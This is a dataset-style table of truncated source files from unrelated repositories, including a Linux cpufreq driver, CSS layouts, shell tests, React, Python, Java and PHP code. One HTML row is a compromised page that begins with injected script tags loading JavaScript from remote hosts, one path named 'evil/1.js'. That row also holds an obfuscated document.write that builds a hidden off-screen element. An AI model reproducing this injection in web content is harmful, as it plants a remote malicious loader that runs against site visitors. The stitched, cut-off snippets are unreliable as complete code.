code stringlengths 3 1.01M | repo_name stringlengths 5 116 | path stringlengths 3 311 | language stringclasses 30
values | license stringclasses 15
values | size int64 3 1.01M |
|---|---|---|---|---|---|
/*
* Copyright (C) 2013-2015 Freescale Semiconductor, Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/busfreq-imx6.h>
#include <linux/clk.h>
#include <... | RealDigitalMediaAndroid/linux-imx6 | drivers/cpufreq/cpufreq-imx6.c | C | gpl-2.0 | 13,781 |
/* ** LAYOUTS ** */
/* Based on standard 960 16 Column Grid */
/* Layout 01 */
.sn-layout1 .sn-layout-container { width: 960px; margin: 0 auto; }
.sn-layout1 .sn-layout-head { margin: 10px; padding: 5px; }
.sn-layout1 .sn-layout-foot { margin: 10px; padding: 5px; }
.sn-layout1 .sn-column1 { margin: 10px; padding: 5px;... | vlslavik/SenseNet | Source/SenseNet/WebSite/Root/Global/styles/sn-layout.css | CSS | gpl-2.0 | 4,236 |
#!/bin/bash
SELF=`dirname ${BASH_SOURCE}`
. ${SELF}/../common.sh
CURRENT_OUTPUTS[0]="output/evidence/annotated.gd"
EXPECTED_OUTPUTS[0]="expected.gd"
TESTCMD=" \
${BRESEQ} \
-b 0 \
-o ${SELF} \
-r ${DATADIR}/REL606/REL606.fragment.gbk \
-s ${DATADIR}/REL606/REL606.is.gbk \
${DATADIR}/... | tectronics/breseq | tests/REL606_fragment_is_junction_only/testcmd.sh | Shell | gpl-2.0 | 377 |
/* Copyright Statement:
*
* This software/firmware and related documentation ("MediaTek Software") are
* protected under relevant copyright laws. The information contained herein
* is confidential and proprietary to MediaTek Inc. and/or its licensors.
* Without the prior written permission of MediaTek inc. and/or ... | lenovo-a3-dev/kernel_lenovo_a3 | mediatek/custom/lenovo89_tb_twn_a_jb2/hal/imgsensor/src/cfg_setting_imgsensor.cpp | C++ | gpl-2.0 | 6,495 |
#!/bin/sh
if [ "$1" == "" ]; then
echo center-image.sh: need input filename and output filename
exit 1
fi
if [ "$2" == "" ]; then
echo center-image.sh: need output filename
exit 1
fi
if [ ! -r $1 ]; then
echo center-image.sh: no such input image $1
exit 1
fi
convert $1 -gravity center -extent 60... | oracc/oracc | misc/xpd2/center-image.sh | Shell | gpl-2.0 | 351 |
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0... | ForAEdesWeb/AEW2 | images/Chershire/02021757609vn.html | HTML | gpl-2.0 | 60,412 |
// Emacs style mode select -*- C++ -*-
//-----------------------------------------------------------------------------
//
// $Id$
//
// Copyright (C) 1993-1996 by id Software, Inc.
// Copyright (C) 2006-2013 by The Odamex Team.
//
// This program is free software; you can redistribute it and/or
// modify it under th... | AlexMax/odamex-alexmax | common/m_random.h | C | gpl-2.0 | 3,118 |
import React, { useContext, useEffect, Fragment } from "react"
import { Typography } from "@material-ui/core"
import EventsContext from "../context/EventsContext"
import TitleContext from "../context/TitleContext"
import Box from "@material-ui/core/Box"
import Button from "@material-ui/core/Button"
import FacebookIcon ... | enricobattocchi/closerintime | src/components/Sentence.js | JavaScript | gpl-2.0 | 6,042 |
/*
* This file is part of gshutdown.
*
* Copyright (c) GShutdown Team <gshutdown@gmail.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at y... | Asher256/gshutdown | src/misc.c | C | gpl-2.0 | 6,180 |
from razer.client import DeviceManager
from razer.client import constants as razer_constants
# Create a DeviceManager. This is used to get specific devices
device_manager = DeviceManager()
print("Found {} Razer devices".format(len(device_manager.devices)))
print()
# Disable daemon effect syncing.
# Without this, th... | z3ntu/razer-drivers | examples/basic_effect.py | Python | gpl-2.0 | 718 |
"""Pets now have a description
Revision ID: 0c431867c679
Revises: 5b1bdc1f3125
Create Date: 2016-11-07 18:36:25.912155
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '0c431867c679'
down_revision = '5b1bdc1f3125'
branch_labels = None
depends_on = None
def upgr... | asif-mahmud/Pyramid-Apps | pethouse/alembic/versions/0c431867c679_pets_now_have_a_description.py | Python | gpl-2.0 | 659 |
package controler;
import java.awt.Color;
import java.awt.event.ActionEvent;
import java.util.Observable;
import java.util.Observer;
import javax.swing.AbstractAction;
import javax.swing.BorderFactory;
import javax.swing.ImageIcon;
import javax.swing.JButton;
// INTERNE
import model.Model;
import ressource... | caronpe/dessinvectoriel | controler/ActionOutilTrait.java | Java | gpl-2.0 | 1,809 |
package command;
import org.junit.Test;
/**
* Created by eder on 19/10/15.
*/
public class RemoteCeilingFanTest {
@Test
public void testRemoteControlCeilingFan(){
RemoteControl remoteControl = new RemoteControl();
CeilingFan ceilingFan = new CeilingFan("Living room");
CeilingFanHi... | EderRoger/design_pattern | test/src/command/RemoteCeilingFanTest.java | Java | gpl-2.0 | 1,075 |
#! /usr/bin/env bash
$XGETTEXT kabcresource.cpp -o $podir/akonadi_kabc_resource.pot
$XGETTEXT kresourceassistant.cpp -o $podir/akonadi_kresourceassistant.pot
| kolab-groupware/kdepim-runtime | resources/kabc/Messages.sh | Shell | gpl-2.0 | 158 |
/*
Copyright (c) 2004, 2005, 2006, 2007, 2008, 2009 Mark Aylett <mark.aylett@gmail.com>
This file is part of Aug written by Mark Aylett.
Aug is released under the GPL with the additional exemption that compiling,
linking, and/or using OpenSSL is allowed.
Aug is free software; you can redistribute it and/or... | marayl/aug | src/c/augctx/lock.h | C | gpl-2.0 | 1,440 |
/* LibTomCrypt, modular cryptographic library -- Tom St Denis
*
* LibTomCrypt is a library that provides various cryptographic
* algorithms in a highly modular and flexible manner.
*
* The library is free for all purposes without any express
* guarantee it works.
*/
#include "tomcrypt_private.h"
#ifdef LTC_PBES... | mangosthree/server | dep/tomlib/Crypt/src/misc/pbes/pbes2.c | C | gpl-2.0 | 7,865 |
class movie:
"""Stores movie metadata"""
# The constructor takes
# - The Title
# - The youtube trailer
# - The poster image URL
def __init__(self, title, youtube_trailer, poster_url):
self.title = title
self.trailer_youtube_url = youtube_trailer
self.poster_image... | amilendra/Udacity_FullStack_P1_MovieTracker | media.py | Python | gpl-2.0 | 338 |
/**
* All Tax meta class
*
* JS used for the custom fields and other form items.
*
* Copyright 2012 Ohad Raz (admin@bainternet.info)
* @since 1.0
*/
var $ =jQuery.noConflict();
function update_repeater_fields(){
/**
* Datepicker Field.
*
* @since 1.0
*/
$('.at-date').each( function() {
... | FeGHeidelberg/wp_feg-heidelberg_de | wp-content/themes/churchope/backend/js/tax-meta-clss.js | JavaScript | gpl-2.0 | 8,497 |
/*
This file is part of Jedi Knight 2.
Jedi Knight 2 is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2
as published by the Free Software Foundation.
Jedi Knight 2 is distributed in the hope that it will be useful,
but WITHOUT ANY... | BruceJohnJennerLawso/OtherJK | codeJK2/game/g_items.cpp | C++ | gpl-2.0 | 31,183 |
<?php
defined('ZOTOP') OR die('No direct access allowed.');
/**
* ipbanned
*
* @package system
* @author zotop team
* @copyright (c)2009-2011 zotop team
* @license http://zotop.com/license.html
*/
class system_model_ipbanned extends model
{
protected $pk = 'ip';
protected $table = 'ipbanned';
/**
... | zotopteam/zotop | zotop/apps/system/models/ipbanned.php | PHP | gpl-2.0 | 2,109 |
/**
* The Forgotten Server - a free and open-source MMORPG server emulator
* Copyright (C) 2016 Mark Samman <mark.samman@gmail.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; eithe... | babymannen/theforgottenserver-7.4 | src/events.h | C | gpl-2.0 | 3,226 |
/*---------------------------------------------------------------------------*\
========= |
\\ / F ield | OpenFOAM: The Open Source CFD Toolbox
\\ / O peration |
\\ / A nd | Copyright held by original author
\\/ M anipulation |
------------------... | Unofficial-Extend-Project-Mirror/openfoam-extend-Core-OpenFOAM-1.5-dev | src/autoMesh/autoHexMesh/autoHexMeshDriver/autoLayerDriver.C | C++ | gpl-2.0 | 91,729 |
# ics
| kstsvcs/ics | README.md | Markdown | gpl-2.0 | 6 |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<p>use F12 to debug</p>
<script type="text/javascript">
a = 5;
b = 6;
c = a + b;
console.log(c);
</script>
</body>
</html> | wenger67/LearnJS | 19 debug/consoleLog.html | HTML | gpl-2.0 | 234 |
<?php
/**
* ChronoCMS version 1.0
* Copyright (c) 2012 ChronoCMS.com, All rights reserved.
* Author: (ChronoCMS.com Team)
* license: Please read LICENSE.txt
* Visit http://www.ChronoCMS.com for regular updates and information.
**/
namespace GCore\Libs;
defined('_JEXEC') or die('Restricted access');
defined("GCORE_SITE"... | zanderkyle/zandergraphics | administrator/components/com_chronocontact/libs/validate.php | PHP | gpl-2.0 | 2,052 |
/*******************************************************************************
Copyright 2010 Whole Foods Co-op
This file is part of IT CORE.
IT CORE is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Fo... | GeorgeStreetCoop/CORE-POS | pos/is4c-nf/scale-drivers/drivers/NewMagellan/SPH_Magellan_Locking.cs | C# | gpl-2.0 | 7,069 |
/* Disassembly display.
Copyright (C) 1998-2017 Free Software Foundation, Inc.
Contributed by Hewlett-Packard Company.
This file is part of GDB.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Softwa... | ganboing/binutils-gdb | gdb/tui/tui-disasm.c | C | gpl-2.0 | 11,696 |
/*
* Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free ... | loverdos/javac-openjdk7 | src/main/java/openjdk7/com/sun/tools/javac/code/BoundKind.java | Java | gpl-2.0 | 1,721 |
/*
JPC: An x86 PC Hardware Emulator for a pure Java Virtual Machine
Copyright (C) 2012-2013 Ian Preston
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as published by
the Free Software Foundation.
This progra... | smeny/JPC | src/main/java/com/github/smeny/jpc/emulator/execution/opcodes/pm/fxch_ST0_ST2.java | Java | gpl-2.0 | 1,856 |
/**
* Copyright (c) 2009--2010 Red Hat, Inc.
*
* This software is licensed to you under the GNU General Public License,
* version 2 (GPLv2). There is NO WARRANTY for this software, express or
* implied, including the implied warranties of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. You should have rece... | colloquium/spacewalk | java/code/src/com/redhat/rhn/frontend/action/systems/monitoring/ProbesListSetupAction.java | Java | gpl-2.0 | 2,226 |
<html>
<HEAD>
<LINK REL="StyleSheet" TYPE="text/css" HREF="exportdetails_item_standard_black.css"></LINK>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<TITLE>The Authority, Vol. 5 #17</TITLE>
</HEAD>
<BODY onload="initPage();">
<div align="center">
<div class="navigat... | MiniSEC/MiniSEC.github.io | assets/comics/Wishlist/details/9115.html | HTML | gpl-2.0 | 8,234 |
package com.yh.hr.res.pt.queryhelper;
import com.yh.hr.res.pt.dto.PtReportHistoryDTO;
import com.yh.platform.core.dao.DaoUtil;
import com.yh.platform.core.exception.ServiceException;
import com.yh.platform.core.util.BeanHelper;
import org.apache.commons.collections.CollectionUtils;
import java.util.List;
/**
* 获取报表... | meijmOrg/Repo-test | freelance-hr-res/src/java/com/yh/hr/res/pt/queryhelper/PtReportHistoryQueryHelper.java | Java | gpl-2.0 | 1,027 |
/*
* Copyright (C) 2013 Andreas Steffen
* HSR Hochschule fuer Technik Rapperswil
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) a... | Ibrahimous/strongswan | src/libimcv/imv/imv_policy_manager.c | C | gpl-2.0 | 8,684 |
//
// Copyright (c) 2013 Benjamin Kaufmann
//
// This file is part of Clasp. See http://www.cs.uni-potsdam.de/clasp/
//
// Clasp is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 2 of the Licens... | utexas-bwi/clasp | libclasp/src/logic_program.cpp | C++ | gpl-2.0 | 50,249 |
/* Cabal - Legacy Game Implementations
*
* Cabal is the legal property of its developers, whose names
* are too numerous to list here. Please refer to the COPYRIGHT
* file distributed with this source distribution.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of t... | project-cabal/cabal | backends/graphics/opengl/opengl-graphics.cpp | C++ | gpl-2.0 | 39,193 |
/*
Google HTML5 slides template
Authors: Luke Mahé (code)
Marcin Wichary (code and design)
Dominic Mazzoni (browser compatibility)
Charles Chen (ChromeVox support)
URL: http://code.google.com/p/html5slides/
*/
var PERMANENT_URL_PREFIX = 'https://magni.me/presentation-pugbo-php... | ilbonzo/presentation-pugbo-php54 | js/slides.js | JavaScript | gpl-2.0 | 14,822 |
/*
* Copyright (C) 2009 Swedish Institute of Computer Science (SICS) Copyright (C)
* 2009 Royal Institute of Technology (KTH)
*
* KompicsToolbox is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either ver... | Decentrify/GVoD | hops/core/src/main/java/se/sics/nstream/hops/kafka/avro/AvroParser.java | Java | gpl-2.0 | 4,973 |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<link rel="stylesheet" media="screen" type="text/css" href="./style.css" />
<link rel="stylesheet" media="screen" type="text/css" href="./design.css" />
<link ... | ee-lco/geda-gaf | docs/wiki/geda-pcb_funding_sow.html | HTML | gpl-2.0 | 46,268 |
/*
* Copyright (C) 2002-2012 by Dave J. Andruczyk <djandruczyk at yahoo dot com>
*
* Linux Megasquirt tuning software
*
*
* This software comes under the GPL (GNU Public License)
* You may freely copy,distribute etc. this as long as the source code
* is made available for FREE.
*
* No warranty is made or i... | djandruczyk/MegaTunix | src/personalities.c | C | gpl-2.0 | 11,460 |
package com.kartoflane.superluminal2.ui.sidebar.data;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.layout.GridLayout;
import org.eclipse.swt.widgets.Button;
import org.eclipse.swt... | kartoFlane/superluminal2 | src/java/com/kartoflane/superluminal2/ui/sidebar/data/ImageDataComposite.java | Java | gpl-2.0 | 3,552 |
/*
* netfilter module for userspace bridged Ethernet frames logging daemons
*
* Authors:
* Bart De Schuymer <bdschuym@pandora.be>
* Harald Welte <laforge@netfilter.org>
*
* November, 2004
*
* Based on ipt_ULOG.c, which is
* (C) 2000-2002 by Harald Welte <laforge@netfilter.org>
*
* This module a... | Jackeagle/android_kernel_sony_c2305 | net/bridge/netfilter/ebt_ulog.c | C | gpl-2.0 | 9,290 |
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("be... | hudsonmendes/benchmark-itextsharp-pdf-from-html-thumb | Properties/AssemblyInfo.cs | C# | gpl-2.0 | 1,456 |
/*
* Copyright (C) 2011 University of Szeged
* Copyright (C) 2011 Gabor Loki <loki@webkit.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must re... | teamfx/openjfx-8u-dev-rt | modules/web/src/main/native/Source/WTF/wtf/ParallelJobsGeneric.cpp | C++ | gpl-2.0 | 4,438 |
/*
* This file is part of the KDE project
*
* Copyright (C) 2013 Arjen Hiemstra <ahiemstra@heimr.nl>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the L... | TheTypoMaster/calligra | components/View.h | C | gpl-2.0 | 3,430 |
#ifndef STRAT_SIMPLE_H
#define STRAT_SIMPLE_H
#include "kernel/stratege_machine/stratege.h"
class stratcomplexedef : public strategy
{
public:
int m_stratcolor;
////////////////////////////////////////////////
/// function : Initialise()
/// descrition : intialise the checkpoint color
/// param : no... | jbtredez/Atlantronic | src/disco/strat/strat_complexe_def.h | C | gpl-2.0 | 712 |
/* -*- Mode: C; tab-width: 4; indent-tabs-mode: t; c-basic-offset: 4 -*- */
/* NetworkManager -- Network link manager
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of th... | sujithpshankar/nm | src/platform/wifi/wifi-utils-private.h | C | gpl-2.0 | 2,472 |
<?php
// Exit if accessed directly
if ( !defined('ABSPATH')) exit;
/**
* Sidebar Right Half Template
*
*
* @file sidebar-right-half.php
* @package Responsive
* @author Emil Uzelac
* @copyright 2003 - 2012 ThemeID
* @license license.txt
* @version Release: 1.0
*... | ianknauer/TeF_wordpress | wp-content/themes/Trottier/sidebar-home.php | PHP | gpl-2.0 | 977 |
from __future__ import with_statement
from fabric.api import task
@task
def md5():
"""
Check MD5 sums (unavailable, empty, with content)
"""
import hashlib
from fabric.api import cd, hide, run, settings
import fabtools
with cd('/tmp'):
run('touch f1')
assert fabtools.f... | juanantoniofm/accesible-moodle | fabtools/tests/fabfiles/md5.py | Python | gpl-2.0 | 590 |
require 'rubygems'
require 'oauth'
module YammerAPI
class Client
def initialize(app_key, app_secret)
@consumer = OAuth::Consumer.new(app_key, app_secret,
{:site => "https://www.yammer.com"}
)
end
def user_authenticated?
... | sitharus/kumara | lib/client.rb | Ruby | gpl-2.0 | 915 |
/*
* vpx3220a, vpx3216b & vpx3214c video decoder driver version 0.0.1
*
* Copyright (C) 2001 Laurent Pinchart <lpinchart@freegates.be>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; ei... | mbadarkhe/davinci-next | drivers/media/i2c/vpx3220.c | C | gpl-2.0 | 15,309 |
// Copyright 2012,2013 Vaughn Vernon
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable l... | LeonardCohen/coding | IDDD_Samples-master/agilepm/src/test/java/com/saasovation/agilepm/application/product/ProductApplicationServiceTest.java | Java | gpl-2.0 | 8,537 |
package com.atux.desktop.promocion;
import com.atux.bean.precios.Local;
import com.atux.bean.precios.LocalFlt;
import com.atux.bean.promocion.Promocion;
import com.atux.bean.promocion.PromocionDetalle;
import com.atux.bean.promocion.PromocionLocal;
import com.atux.config.APDD;
import com.atux.desktop.comun.pic... | AlanGuerraQuispe/SisAtuxPerfumeria | atux-desktop/src/main/java/com/atux/desktop/promocion/PromocionPst.java | Java | gpl-2.0 | 7,829 |
/*
* Copyright (C) 2008-2013 TrinityCore <http://www.trinitycore.org/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later ve... | Spade17/4.3.4-Core | src/server/shared/Database/QueryHolder.cpp | C++ | gpl-2.0 | 5,905 |
/*
* linux/arch/arm/plat-s5pc1xx/s5pc1xx-cpufreq.c
*
* CPU frequency scaling for S5PC1XX
*
* Copyright (C) 2008 Samsung Electronics
*
* Based on cpu-sa1110.c, Copyright (C) 2001 Russell King
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Pu... | ZhizhouTian/s3c-linux | arch/arm/plat-s5pc1xx/s5pc1xx-cpufreq.c | C | gpl-2.0 | 11,879 |
package com.example.murat.gezi_yorum.Fragments;
import android.content.Context;
import android.os.Bundle;
import android.os.Handler;
import android.support.annotation.Nullable;
import android.support.v4.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import an... | bugdetector/Gezi-Yorum | app/src/main/java/com/example/murat/gezi_yorum/Fragments/Notifications.java | Java | gpl-2.0 | 5,164 |
//>>built
define("dojox/embed/flashVars",["dojo"],function(f){f.deprecated("dojox.embed.flashVars","Will be removed in 2.0","2.0");var e={serialize:function(g,b){var e=function(a){"string"==typeof a&&(a=a.replace(/;/g,"_sc_"),a=a.replace(/\./g,"_pr_"),a=a.replace(/\:/g,"_cl_"));return a},h=dojox.embed.flashVars.seriali... | joshuacoddingyou/php | public/scripts/dojox/embed/flashVars.js | JavaScript | gpl-2.0 | 621 |
ifndef PYTHON
PYTHON=$(shell which python3 2>/dev/null || which python2 2>/dev/null || which python 2>/dev/null)
endif
VERSION=$(shell $(PYTHON) setup.py --version 2>/dev/null)
PYTHON_DEVELOP_ARGS=$(shell if ($(PYTHON) setup.py develop --help 2>/dev/null | grep -q '\-\-user'); then echo "--user"; else echo ""; fi)
DEST... | chloerh/avocado-vt | Makefile | Makefile | gpl-2.0 | 2,910 |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... | DruggedBunny/openb3d.mod | openb3d.mod/html/globals_w.html | HTML | gpl-2.0 | 2,826 |
package ee.esutoniagodesu.domain.jmet.table;
import org.hibernate.annotations.Immutable;
import javax.persistence.*;
import java.io.Serializable;
@Entity
@Immutable
@Table(name = "kwginf", schema = "jmet")
public final class Kwginf implements Serializable {
private static final long serialVersionUID = 42470602... | esutoniagodesu/egd-web | src/main/java/ee/esutoniagodesu/domain/jmet/table/Kwginf.java | Java | gpl-2.0 | 1,728 |
/*
* Copyright (c) 2001, 2016, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free ... | FauxFaux/jdk9-hotspot | src/share/vm/gc/shared/collectedHeap.hpp | C++ | gpl-2.0 | 25,700 |
showWord(["n. ","Boutik, magazen, kote yo vann. Nan ri sa a, gen anpil konmès."
]) | georgejhunt/HaitiDictionary.activity | data/words/konm~es_k~om~es_.js | JavaScript | gpl-2.0 | 83 |
<?php
if ( ! defined( 'ABSPATH' ) ) exit;
/**
* Unfortunately WordPress supports PHP 5.2 even though
* everyone should now be using at least PHP 5.3.
*
* To be compatible with PHP 5.2 below you will find functions
* that are required in order to make this plugin work correctly.
*/
add_action( 'admin_notices', ... | Zduhamel/PT-JOB-FUSION | wp-content/plugins/wp-job-manager-field-editor/includes/compatibility.php | PHP | gpl-2.0 | 4,925 |
<HTML>
<HEAD>
<TITLE>XBAT Menu Reference (Alphabetical)</TITLE>
<LINK REL="stylesheet" TYPE="text/css" HREF="xbat-keys.css">
</HEAD>
<BODY>
<H1>XBAT Menu Reference</BR>(Alphabetical)</H1>
<TABLE CLASS="keys">
<TR CLASS="header">
<TH WIDTH="60%">Command</TH>
<TH WIDTH="40%">Keyboard Shortcut</TH>
</TR>
<TR>
<TD><DIV CL... | djamesbarker/USV_AutoDetection | Docs/xbat-menus.html | HTML | gpl-2.0 | 8,035 |
<div class="post-container">
<div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
<?php if ( has_post_thumbnail() ) : ?>
<a class="featured-media" title="<?php the_title_attribute(); ?>" href="<?php the_permalink(); ?>">
<?php the_post_thumbnail('post-thumb'); ?>
</a> <!-- /featured-m... | immist/herbarium-theme | wp-content/themes/fukasawa/content.php | PHP | gpl-2.0 | 1,018 |
<?php
/**
* @package Search - ZOO
* @author YOOtheme http://www.yootheme.com
* @copyright Copyright (C) YOOtheme GmbH
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 only
*/
// no direct access
defined('_JEXEC') or die('Restricted access');
jimport('joomla.plugin.plugin');
class plgSearchZo... | knigherrant/decopatio | plugins/search/zoosearchcal/zoosearchcal.php | PHP | gpl-2.0 | 7,125 |
# Security Policy
## Supported Versions
* The latest *stable* release of UnrealIRCd 5 (until 2023-07-01)
* The latest *stable* release of UnrealIRCd 6
See [UnrealIRCd releases](https://www.unrealircd.org/docs/UnrealIRCd_releases) for information on older versions and End Of Life dates.
## Reporting a Vulnerability
... | unrealircd/unrealircd | SECURITY.md | Markdown | gpl-2.0 | 1,121 |
#!/bin/bash
# This is not necessarily the top-level run.sh as it is in other directories. see README.txt first.
tri5_only=false
sgmm5_only=false
denlats_only=false
data_only=false
morfessor=true
tag_percentage=0.1
[ ! -f ./lang.conf ] && echo 'Language configuration does not exist! Use the configurations in conf/la... | michellemorales/OpenMM | kaldi/egs/babel/s5d/run-1-main-unicode.sh | Shell | gpl-2.0 | 14,990 |
/*
* Copyright 2005 Sun Microsystems, Inc. All Rights Reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundati... | TheTypoMaster/Scaper | openjdk/jdk/src/share/classes/com/sun/imageio/stream/CloseableDisposerRecord.java | Java | gpl-2.0 | 1,969 |
@extends("admin.main")
@section("content")
<h1 class="title">Post add</h1>
@include('errors.list')
{!! Form::open(["action" => "Admin\PostsController@store", "method" => "POST", "class" => "form-horizontal"]) !!}
<!--- Title Field --->
<div class="form-group">
{!! Form::label('title', 'T... | avengerweb/my-own-blog | resources/views/admin/blog/posts/add.blade.php | PHP | gpl-2.0 | 2,111 |
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <errno.h>
#include <fcntl.h>
#include <net/ethernet.h>
#ifdef _MINGW_
#include <winsock2.h>
#else
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#defi... | nanshusu/nanshusu.github.cn | uware/src/sundry/app/l2c/l2c_tcp.c | C | gpl-2.0 | 8,547 |
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>util</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="te... | platinhom/ManualHom | Schrodinger/Schrodinger_2015-2_docs/python_api/api/toc-schrodinger.infra.util-module.html | HTML | gpl-2.0 | 1,496 |
/*
*@BEGIN LICENSE
*
* PSI4: an ab initio quantum chemistry software package
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any ... | spring01/libPSI | src/bin/cchbar/Wabei_BBBB_UHF.cc | C++ | gpl-2.0 | 12,328 |
package org.insightcentre.unlp.naisc.wordalign;
import java.util.Map;
/**
* A factory for making word alignment feature extractors
*
* @author John McCrae <john@mccr.ae>
*/
public interface WordAlignmentFeatureExtractorFactory {
/**
* An identifier for this WAFE
* @return The identifier
*/
... | jmccrae/naisc | word-align/src/main/java/org/insightcentre/unlp/naisc/wordalign/WordAlignmentFeatureExtractorFactory.java | Java | gpl-2.0 | 560 |
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>schrodinger.application.matsci.builderwidgets.ItemRowWithTemplates</title>
<link rel="style... | platinhom/ManualHom | Schrodinger/Schrodinger_2015-2_docs/python_api/api/schrodinger.application.matsci.builderwidgets.ItemRowWithTemplates-class.html | HTML | gpl-2.0 | 46,371 |
/*
* Copyright (c) 2012 Mellanox Technologies. All rights reserved
*
* This software is available to you under a choice of one of two
* licenses. You may choose to be licensed under the terms of the GNU
* General Public License (GPL) Version 2, available from the file
* COPYING in the main directory of this sour... | u9621071/kernel-uek-UEK3 | include/rdma/e_ipoib.h | C | gpl-2.0 | 1,919 |
/**
* LinkedLists Data Structure
**/
/*future feature to include
* Passing a function as an argument.
* Passing a function which takes input templates
* */
#ifndef __LINKEDLISTS__
#define __LINKEDLISTS__
#include<iostream>
struct Nodel
{
Nodel(int keyv):key(keyv){Nodel();}
Nodel():next(NULL),key(-1){}
... | ahmedosman/Random_Data_Structures | DS_Practice/Data_Structures/LinkedLists.h | C | gpl-2.0 | 524 |
<?php
/**
* @package EasyDiscuss
* @copyright Copyright (C) 2010 Stack Ideas Private Limited. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* EasyDiscuss is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of ... | awc737/rcc-joomla | administrator/components/com_easydiscuss/views/spools/view.html.php | PHP | gpl-2.0 | 2,228 |
<?
/**********************************************************************
* N/X - Web Content Management System
* Copyright 2002 Sven Weih, FZI Research Center for Information Technologies
* www.fzi.de
*
* This file is part of N/X.
* The initial has been setup as a small diploma thesis (Studienarbe... | sweih/nxr | cms/api/database/updateset.php | PHP | gpl-2.0 | 2,342 |
@extends('defaults.masterpage')
@section('header')
{{ HTML::style('css/main.css') }}
<title>Edit Booking</title>
@stop
@section('content')
<center>
<div id="cover" >
{{Form::open(['route'=>'booking.store'])}}
<table id = "tabler" >
<tr>
